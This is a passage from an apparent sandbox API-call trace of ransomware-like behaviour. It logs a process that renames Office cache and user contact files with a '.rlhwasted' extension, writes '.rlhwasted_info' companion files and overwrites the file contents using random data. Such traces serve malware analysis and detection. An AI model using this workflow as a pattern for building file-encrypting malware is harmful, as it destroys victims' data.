(in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.668] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.668] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0185.668] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6d4580 [0185.668] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.668] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.668] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0185.669] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.669] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.669] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.671] WriteFile (in: hFile=0x104, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.672] SetEndOfFile (hFile=0x104) returned 1 [0185.672] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.672] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.672] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.672] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0185.673] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0185.674] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0185.674] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x412b [0185.674] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x412b) returned 0x6a0000 [0185.674] CloseHandle (hObject=0x10c) returned 1 [0185.680] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0185.681] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.681] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.681] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0185.682] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.682] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.692] SetEndOfFile (hFile=0x104) returned 1 [0185.695] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.695] CloseHandle (hObject=0x104) returned 1 [0185.705] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0185.705] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef488 | out: hHeap=0x6b0000) returned 1 [0185.706] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0185.713] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.713] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.713] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0185.713] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ac) returned 0x70d2b0 [0185.713] lstrcpyW (in: lpString1=0x70d352, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.713] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.713] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0185.714] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.714] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.714] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.716] WriteFile (in: hFile=0x104, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.717] SetEndOfFile (hFile=0x104) returned 1 [0185.717] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.717] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.717] lstrcpyW (in: lpString1=0x70d352, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.rlhwasted")) returned 1 [0185.718] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0185.719] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0185.719] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x10b2 [0185.719] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0xb00000 [0185.719] CloseHandle (hObject=0x10c) returned 1 [0185.722] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0185.723] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.723] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.723] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0185.724] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.724] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.734] SetEndOfFile (hFile=0x104) returned 1 [0185.736] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.736] CloseHandle (hObject=0x104) returned 1 [0185.851] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70d2b0 | out: hHeap=0x6b0000) returned 1 [0185.851] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e93e8 | out: hHeap=0x6b0000) returned 1 [0185.851] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0185.852] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.852] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.852] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0185.852] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6ef298 [0185.852] lstrcpyW (in: lpString1=0x6ef330, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.852] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0185.852] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0185.853] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0185.853] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.854] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.854] WriteFile (in: hFile=0x104, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.855] SetEndOfFile (hFile=0x104) returned 1 [0185.856] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.856] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0185.856] lstrcpyW (in: lpString1=0x6ef330, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0185.857] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0185.857] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0185.857] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x5061 [0185.857] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5061) returned 0x6a0000 [0185.857] CloseHandle (hObject=0x110) returned 1 [0185.867] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0185.867] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.867] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.868] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0185.868] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.869] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.878] SetEndOfFile (hFile=0x104) returned 1 [0185.930] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0185.930] CloseHandle (hObject=0x104) returned 1 [0185.966] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0185.966] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed638 | out: hHeap=0x6b0000) returned 1 [0185.993] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0185.994] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.994] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0185.994] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28e) returned 0x6ef298 [0185.994] lstrcpyW (in: lpString1=0x6ef31c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.994] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.994] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0185.996] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.996] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0185.998] WriteFile (in: hFile=0x128, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.999] SetEndOfFile (hFile=0x128) returned 1 [0186.000] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.000] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0186.000] lstrcpyW (in: lpString1=0x6ef31c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.rlhwasted")) returned 1 [0186.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0186.002] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0186.002] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x49a [0186.002] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x49a) returned 0x6a0000 [0186.002] CloseHandle (hObject=0x104) returned 1 [0186.025] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0186.026] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0186.026] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.027] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0186.027] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0186.027] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.066] SetEndOfFile (hFile=0x128) returned 1 [0186.068] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0186.068] CloseHandle (hObject=0x128) returned 1 [0186.070] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0186.070] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f8ef8 | out: hHeap=0x6b0000) returned 1 [0186.071] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f98) returned 1 [0186.072] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0186.072] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0186.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0186.072] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x288) returned 0x6ef298 [0186.073] lstrcpyW (in: lpString1=0x6ef316, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.073] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0186.073] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f98) returned 1 [0186.073] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0186.073] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0186.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0186.074] WriteFile (in: hFile=0x128, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0186.075] SetEndOfFile (hFile=0x128) returned 1 [0186.075] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.075] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0186.075] lstrcpyW (in: lpString1=0x6ef316, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.rlhwasted")) returned 1 [0186.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0186.082] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0186.082] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x499 [0186.082] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x499) returned 0xb00000 [0186.082] CloseHandle (hObject=0x10c) returned 1 [0186.633] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0186.634] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0186.634] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.634] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0186.635] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0186.635] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.646] SetEndOfFile (hFile=0x128) returned 1 [0186.649] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.649] CloseHandle (hObject=0x128) returned 1 [0186.652] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0186.652] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8a70 | out: hHeap=0x6b0000) returned 1 [0186.653] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0186.654] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0186.654] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.654] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0186.654] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6ef298 [0186.654] lstrcpyW (in: lpString1=0x6ef318, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.654] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0186.654] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0186.655] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0186.655] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.rlhwasted_info"), 